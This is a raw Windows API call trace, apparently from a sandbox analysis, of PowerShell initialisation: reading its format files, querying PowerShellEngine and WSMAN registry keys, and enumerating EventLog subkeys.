	[0350.329] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa327c262, Data2=0x7e98, Data3=0x47b4, Data4=([0]=0xb9, [1]=0xa8, [2]=0xdb, [3]=0x7a, [4]=0xf, [5]=0x8e, [6]=0x77, [7]=0xc6))) returned 0x0
	[0350.329] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x22c0cb18, Data2=0x7e3, Data3=0x425d, Data4=([0]=0xaf, [1]=0xcf, [2]=0x25, [3]=0x4c, [4]=0x9a, [5]=0xd8, [6]=0x52, [7]=0x3f))) returned 0x0
	[0350.329] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.329] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.329] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.329] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.330] SetErrorMode (uMode=0x1) returned 0x1
	[0350.330] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0350.330] GetFileType (hFile=0x334) returned 0x1
	[0350.330] SetErrorMode (uMode=0x1) returned 0x1
	[0350.330] GetFileType (hFile=0x334) returned 0x1
	[0350.330] ReadFile (in: hFile=0x334, lpBuffer=0x2fc0540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fc0540*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.331] ReadFile (in: hFile=0x334, lpBuffer=0x2fc0540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fc0540*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.331] ReadFile (in: hFile=0x334, lpBuffer=0x2fc0540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fc0540*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.331] ReadFile (in: hFile=0x334, lpBuffer=0x2fc0540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fc0540*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.331] ReadFile (in: hFile=0x334, lpBuffer=0x2fc0540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fc0540*, lpNumberOfBytesRead=0xcd078*=0x8b4, lpOverlapped=0x0) returned 1
	[0350.331] ReadFile (in: hFile=0x334, lpBuffer=0x2fbf95c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fbf95c*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0350.331] ReadFile (in: hFile=0x334, lpBuffer=0x2fc0540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2fc0540*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0350.332] SetErrorMode (uMode=0x1) returned 0x1
	[0350.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0350.332] SetErrorMode (uMode=0x1) returned 0x1
	[0350.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0350.332] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x334) returned 0x0
	[0350.332] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0350.332] CoTaskMemAlloc (cb=0x5a) returned 0x37db50
	[0350.332] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x37db50, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0350.332] CoTaskMemFree (pv=0x37db50) 
	[0350.332] RegCloseKey (hKey=0x334) returned 0x0
	[0350.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0350.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0350.333] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa58a6d4f, Data2=0x26fc, Data3=0x4204, Data4=([0]=0xa9, [1]=0xda, [2]=0x41, [3]=0xd0, [4]=0x61, [5]=0x22, [6]=0x17, [7]=0xdb))) returned 0x0
	[0350.333] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x33ac8aea, Data2=0x5ff5, Data3=0x47b5, Data4=([0]=0x84, [1]=0x5a, [2]=0x3, [3]=0xec, [4]=0x2c, [5]=0xf1, [6]=0xed, [7]=0x8))) returned 0x0
	[0350.333] SetErrorMode (uMode=0x1) returned 0x1
	[0350.333] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0350.333] GetFileType (hFile=0x334) returned 0x1
	[0350.333] SetErrorMode (uMode=0x1) returned 0x1
	[0350.333] GetFileType (hFile=0x334) returned 0x1
	[0350.334] ReadFile (in: hFile=0x334, lpBuffer=0x2ffe328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe328*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.334] ReadFile (in: hFile=0x334, lpBuffer=0x2ffe328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe328*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.334] ReadFile (in: hFile=0x334, lpBuffer=0x2ffe328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe328*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.335] ReadFile (in: hFile=0x334, lpBuffer=0x2ffe328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe328*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0350.335] ReadFile (in: hFile=0x334, lpBuffer=0x2ffe328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe328*, lpNumberOfBytesRead=0xcd078*=0xe98, lpOverlapped=0x0) returned 1
	[0350.335] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd928, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffd928*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0350.335] ReadFile (in: hFile=0x334, lpBuffer=0x2ffe328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe328*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0350.335] SetErrorMode (uMode=0x1) returned 0x1
	[0350.335] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0350.335] SetErrorMode (uMode=0x1) returned 0x1
	[0350.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0350.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x334) returned 0x0
	[0350.336] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0350.336] CoTaskMemAlloc (cb=0x5a) returned 0x37db50
	[0350.336] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x37db50, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0350.336] CoTaskMemFree (pv=0x37db50) 
	[0350.336] RegCloseKey (hKey=0x334) returned 0x0
	[0350.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0350.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0350.336] VirtualQuery (in: lpAddress=0xcbba0, lpBuffer=0xcca60, dwLength=0x30 | out: lpBuffer=0xcca60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.337] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x85d32d62, Data2=0x4fa3, Data3=0x4373, Data4=([0]=0x8b, [1]=0xa9, [2]=0x37, [3]=0x81, [4]=0x88, [5]=0xfc, [6]=0xe, [7]=0xcb))) returned 0x0
	[0350.337] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xc3caf07e, Data2=0x5b63, Data3=0x4b63, Data4=([0]=0x84, [1]=0xe3, [2]=0x52, [3]=0x50, [4]=0x31, [5]=0x71, [6]=0x47, [7]=0x74))) returned 0x0
	[0350.353] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.353] CoTaskMemFree (pv=0x34ee80) 
	[0350.353] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.354] CoTaskMemFree (pv=0x34ee80) 
	[0350.354] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.354] CoTaskMemFree (pv=0x34ee80) 
	[0350.354] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.354] CoTaskMemFree (pv=0x34ee80) 
	[0350.357] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.357] CoTaskMemFree (pv=0x34ee80) 
	[0350.358] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.358] CoTaskMemFree (pv=0x34ee80) 
	[0350.358] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0350.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.358] CoTaskMemFree (pv=0x34ee80) 
	[0350.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd318 | out: phkResult=0xcd318*=0x334) returned 0x0
	[0350.740] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd21c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd218*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.740] CoTaskMemFree (pv=0x0) 
	[0350.741] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0350.741] RegEnumValueW (in: hKey=0x334, dwIndex=0x0, lpValueName=0x309530, lpcchValueName=0xcd2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.741] CoTaskMemFree (pv=0x309530) 
	[0350.741] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0350.741] RegEnumValueW (in: hKey=0x334, dwIndex=0x1, lpValueName=0x309530, lpcchValueName=0xcd2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.741] CoTaskMemFree (pv=0x309530) 
	[0350.741] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0350.741] RegEnumValueW (in: hKey=0x334, dwIndex=0x2, lpValueName=0x309530, lpcchValueName=0xcd2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.741] CoTaskMemFree (pv=0x309530) 
	[0350.742] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd2ac, lpData=0x0, lpcbData=0xcd2a8*=0x0 | out: lpType=0xcd2ac*=0x1, lpData=0x0, lpcbData=0xcd2a8*=0x8) returned 0x0
	[0350.742] CoTaskMemAlloc (cb=0xc) returned 0x3775a0
	[0350.742] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd27c, lpData=0x3775a0, lpcbData=0xcd278*=0x8 | out: lpType=0xcd27c*=0x1, lpData="2.0", lpcbData=0xcd278*=0x8) returned 0x0
	[0350.742] CoTaskMemFree (pv=0x3775a0) 
	[0351.108] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x304) returned 0x0
	[0351.108] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd16c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd168*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.108] CoTaskMemFree (pv=0x0) 
	[0351.108] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.108] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x309530, lpcchValueName=0xcd218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0351.109] CoTaskMemFree (pv=0x309530) 
	[0351.109] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.109] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x309530, lpcchValueName=0xcd218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0351.109] CoTaskMemFree (pv=0x309530) 
	[0351.109] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.109] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x309530, lpcchValueName=0xcd218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0351.109] CoTaskMemFree (pv=0x309530) 
	[0351.109] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd1fc, lpData=0x0, lpcbData=0xcd1f8*=0x0 | out: lpType=0xcd1fc*=0x1, lpData=0x0, lpcbData=0xcd1f8*=0x8) returned 0x0
	[0351.109] CoTaskMemAlloc (cb=0xc) returned 0x3771a0
	[0351.109] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd1cc, lpData=0x3771a0, lpcbData=0xcd1c8*=0x8 | out: lpType=0xcd1cc*=0x1, lpData="2.0", lpcbData=0xcd1c8*=0x8) returned 0x0
	[0351.109] CoTaskMemFree (pv=0x3771a0) 
	[0351.110] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0351.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.110] CoTaskMemFree (pv=0x34ee80) 
	[0351.115] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0351.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.115] CoTaskMemFree (pv=0x34ee80) 
	[0351.121] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd298 | out: phkResult=0xcd298*=0x308) returned 0x0
	[0351.126] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.126] CoTaskMemFree (pv=0x0) 
	[0351.126] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.127] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.127] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.127] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.127] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.127] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.127] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.127] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.127] CoTaskMemFree (pv=0x309530) 
	[0351.127] CoTaskMemFree (pv=0x0) 
	[0351.128] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.128] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.128] CoTaskMemFree (pv=0x309530) 
	[0351.128] CoTaskMemFree (pv=0x0) 
	[0351.128] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.128] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x309530, lpcchName=0xcd298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.128] CoTaskMemFree (pv=0x309530) 
	[0351.128] CoTaskMemFree (pv=0x0) 
	[0351.128] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x30c) returned 0x0
	[0351.128] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.128] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x320) returned 0x0
